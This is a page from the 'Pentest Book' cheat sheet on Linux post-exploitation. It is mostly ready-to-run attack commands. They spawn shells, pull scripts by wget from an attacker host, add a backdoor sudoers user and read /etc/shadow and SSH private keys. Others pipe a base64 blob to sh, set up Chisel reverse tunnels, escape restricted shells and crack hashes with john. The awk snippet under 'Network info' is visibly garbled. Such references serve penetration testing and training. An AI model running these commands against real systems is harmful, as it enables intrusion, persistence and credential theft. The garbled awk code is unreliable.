Pentest Book
  • /home/six2dez/.pentest-book
  • Contribute/Donate
  • Recon
    • Public info gathering
    • Root domains
    • Subdomain Enum
      • Subdomain Takeover
    • Webs recon
    • Network Scanning
    • Host Scanning
    • Packet Scanning
  • Enumeration
    • Files
    • SSL/TLS
    • Ports
    • Web Attacks
      • General Info
      • Quick tricks
      • Header injections
      • Bruteforcing
      • Online hashes cracked
      • Crawl/Fuzz
      • LFI/RFI
      • File upload
      • SQLi
      • SSRF
      • Open redirects
      • XSS
      • CSP
      • XXE
      • Cookie Padding
      • Webshells
      • CORS
      • CSRF
      • Web Cache Poisoning
      • Broken Links
      • Clickjacking
      • HTTP Request Smuggling
      • Web Sockets
      • CRLF
      • IDOR
      • Web Cache Deception
      • Session fixation
      • Email attacks
      • Pastejacking
      • HTTP Parameter pollution
      • SSTI
      • Prototype Pollution
      • Command Injection
      • Deserialization
      • DNS rebinding
    • Web Technologies
      • APIs
      • JS
      • ASP.NET
      • JWT
      • GitHub
      • GitLab
      • WAFs
      • Firebird
      • Wordpress
      • WebDav
      • Joomla
      • Jenkins
      • IIS
      • VHosts
      • Firebase
      • OWA
      • OAuth
      • Flask
      • Symfony && Twig
      • Drupal
      • NoSQL (MongoDB, CouchDB)
      • PHP
      • RoR (Ruby on Rails)
      • JBoss - Java Deserialization
      • OneLogin - SAML Login
      • Flash SWF
      • Nginx
      • Python
      • Tomcat
      • Adobe AEM
      • Magento
      • SAP
      • MFA/2FA
      • GWT
      • Jira
      • OIDC (Open ID Connect)
      • ELK
      • Sharepoint
      • Others
    • Cloud
      • General
      • Cloud Info Gathering
      • AWS
      • Azure
      • GCP
      • Docker && Kubernetes
      • CDN - Comain Fronting
  • Exploitation
    • Payloads
    • Reverse Shells
    • File transfer
  • Post Exploitation
    • Linux
    • Pivoting
    • Windows
      • AD
        • Kerberos
      • PS tips & tricks
  • Mobile
    • General
    • Android
    • iOS
  • Others
    • Burp Suite
    • Password cracking
    • VirtualBox
    • LLM/AI/ML/prompt testing
    • Code review
    • Pentesting Web checklist
    • Internal Pentest
    • Web fuzzers review
    • Recon suites review
    • Subdomain tools review
    • Random
    • Master assessment mindmaps
    • BugBounty
    • Exploiting
    • tools everywhere
Powered by GitBook
On this page
  • Local Enum
  • Escaping restricted shell
  • Loot

Was this helpful?

Edit on GitHub
Export as PDF
  1. Post Exploitation

Linux

Local Enum

**Tools** 
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh
https://github.com/mbahadou/postenum/blob/master/postenum.sh
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

https://gtfobins.github.io/

# Spawning shell
python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within vi)
:!bash
:set shell=/bin/bash:shell
(From within nmap)
!sh

# Access to more binaries
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

# Download files from attacker
wget http://10.11.1.111:8080/ -r; mv 10.11.1.111:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linpeas.sh postenum.sh pspy32 pspy64

# Enum scripts
./LinEnum.sh -t -k password -r LinEnum.txt
./postenum.sh
./linpeas.sh
./pspy

# Common writable directories
/tmp
/var/tmp
/dev/shm

# Add user to sudoers
useradd hacker
passwd hacker
echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers

# sudo permissions
sudo -l -l

# Journalctl
If you can run as root, run in small window and !/bin/sh

# Crons
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
cat /etc/frontal
cat /etc/anacron
systemctl list-timers --all

# Common info
uname -a
env
id
cat /proc/version
cat /etc/issue
cat /etc/passwd
cat /etc/group
cat /etc/shadow
cat /etc/hosts

# Users with login
grep -vE "nologin" /etc/passwd

# Network info
cat /proc/net/arp
cat /proc/net/fib_trie
cat /proc/net/fib_trie | grep "|--"   | egrep -v "0.0.0.0| 127."
awk '/32 host/ { print f } {f=$2}' <<< "$(0; i-=2) {
        ret = ret"."hextodec(substr(str,i,2))
    }
    ret = ret":"hextodec(substr(str,index(str,":")+1,4))
    return ret
} 
NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}' /proc/net/tcp

# Netstat without netstat 2
echo "YXdrICdmdW5jdGlvbiBoZXh0b2RlYyhzdHIscmV0LG4saSxrLGMpewogICAgcmV0ID0gMAogICAgbiA9IGxlbmd0aChzdHIpCiAgICBmb3IgKGkgPSAxOyBpIDw9IG47IGkrKykgewogICAgICAgIGMgPSB0b2xvd2VyKHN1YnN0cihzdHIsIGksIDEpKQogICAgICAgIGsgPSBpbmRleCgiMTIzNDU2Nzg5YWJjZGVmIiwgYykKICAgICAgICByZXQgPSByZXQgKiAxNiArIGsKICAgIH0KICAgIHJldHVybiByZXQKfQpmdW5jdGlvbiBnZXRJUChzdHIscmV0KXsKICAgIHJldD1oZXh0b2RlYyhzdWJzdHIoc3RyLGluZGV4KHN0ciwiOiIpLTIsMikpOyAKICAgIGZvciAoaT01OyBpPjA7IGktPTIpIHsKICAgICAgICByZXQgPSByZXQiLiJoZXh0b2RlYyhzdWJzdHIoc3RyLGksMikpCiAgICB9CiAgICByZXQgPSByZXQiOiJoZXh0b2RlYyhzdWJzdHIoc3RyLGluZGV4KHN0ciwiOiIpKzEsNCkpCiAgICByZXR1cm4gcmV0Cn0gCk5SID4gMSB7e2lmKE5SPT0yKXByaW50ICJMb2NhbCAtIFJlbW90ZSI7bG9jYWw9Z2V0SVAoJDIpO3JlbW90ZT1nZXRJUCgkMyl9e3ByaW50IGxvY2FsIiAtICJyZW1vdGV9fScgL3Byb2MvbmV0L3RjcCAKqtc" | base64 -d | sh

# Nmap without nmap
for ip in {1..5}; do for port in {21,22,5000,8000,3306}; do (echo >/dev/tcp/172.18.0.$ip/$port) >& /dev/null && echo "172.18.0.$ip port $port is open"; done; done

# Open ports without netstat
grep -v "rem_address" /proc/net/tcp | awk  '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'

# Check ssh files:
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

# SUID
find / -perm -4000 -type f 2>/dev/null
# ALL PERMS
find / -perm -777 -type f 2>/dev/null
# SUID for current user
find / perm /u=s -user `whoami` 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
# Writables for current user/group
find / perm /u=w -user `whoami` 2>/dev/null
find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null
find / -perm /u+w -user `whoami` 2>/dev/nul
# Dirs with +w perms for current u/g
find / perm /u=w -type -d -user `whoami` 2>/dev/null
find / -perm /u+w,g+w -d -user `whoami` 2>/dev/null

# Port Forwarding
# Chisel
# Victim server:
chisel server --auth "test:123" -p 443 --reverse
# In host attacker machine:
./chisel client --auth "test:123" 10.10.10.10:443 R:socks

# Dynamic Port Forwarding:
# Attacker machine:
ssh -D 9050 user@host
# Attacker machine Burp Proxy - SOCKS Proxy:
Mark “Override User Options”
Mark Use Socks Proxy:
SOCKS host:127.0.0.1
SOCKS port:9050

# Tunneling 
Target must have SSH running for there service
1. Create SSH Tunnel: ssh -D localhost: -f -N user@localhost -p 
2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf)
3. Add the following line into the config: Socks5 127.0.0.1 
4. Run commands through the tunnel: proxychains 

# SShuttle
# https://github.com/sshuttle/sshuttle
sshuttle -r root@172.21.0.0 10.2.2.0/24

# netsh port forwarding
netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80
netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000

Escaping restricted shell

# First check your shell
echo $SHELL
# and commands
export

# vim
# List files
:!/bin/ls -l .b*
# Set new shell
:set shell=/bin/sh
:shell
# or
:!/bin/sh

# ed
!'/bin/sh'

# ne -> Load Prefs -> Navigate everywhere

# more/less/man/pinfo
!'sh'

# links -> File OS Shell
# lynx -> "o" for options -> configure default editor e.g. vim
lynx --editor=/usr/bin/vim www.google.com
# or
export EDITOR=/usr/bin/vim
# navigate to https://translate.google.com/ go to text box, ENTER and F4

# mutt
!

# find 
find / -name "root" -exec /bin/sh \;
find / -name "root" -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

# nmap < 2009/05
--interactive
!sh

# awk
awk 'BEGIN {system("/bin/sh")}'

# expect
expect -c 'spawn sh' -i

# python
python -c 'import pty; pty.spawn("/bin/sh")'

# ruby irb
exec '/bin/sh'

# perl
perl -e 'system("sh -i");'
perl -e 'exec("sh -i");'

# php -a
exec("sh -i");

# Only Rbash
echo x | xargs -Iy sh -c 'exec sh 0<&1'

# Emacs
Mod-!
/bin/sh

# cp
cp /bin/sh /dev/shm/sh; /dev/shm/sh

# export
export SHELL=/bin/sh; export PATH=/bin:/usr/bin:$PATH

# FTP/Telnet
!/bin/sh

# GDB
!/bin/sh

# eval
eval echo echo {o..q}ython\;

# tee
echo '/bin/rm /home/user/.bashrc' | tee '/home/user/bin/win';win; echo 'export SHELL=/bin/sh' | tee '/home/user/.bashrc'

# declare
declare -n PATH; export PATH=/bin;bash -i
BASH_CMDS[shell]=/bin/bash;shell -i

# nano
nano -s /bin/sh
# Ctrl+T

# SSH
ssh user@host -t "bash --noprofile -i"
ssh user@host -t "() { :; }; sh -i "

Loot

# Linux
cat /etc/passwd
cat /etc/shadow
unshadow passwd shadow > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

ifconfig -a
arp -a

tcpdump -i any -s0 -w capture.pcap
tcpdump -i eth0 -w capture -n -U -s 0 src not 10.11.1.111 and dst not 10.11.1.111
tcpdump -vv -i eth0 src not 10.11.1.111 and dst not 10.11.1.111

.bash_history

/var/mail
/var/spool/mail

echo $DESKTOP_SESSION
echo $XDG_CURRENT_DESKTOP
echo $GDMSESSION
PreviousFile transferNextPivoting

Last updated 4 years ago

Was this helpful?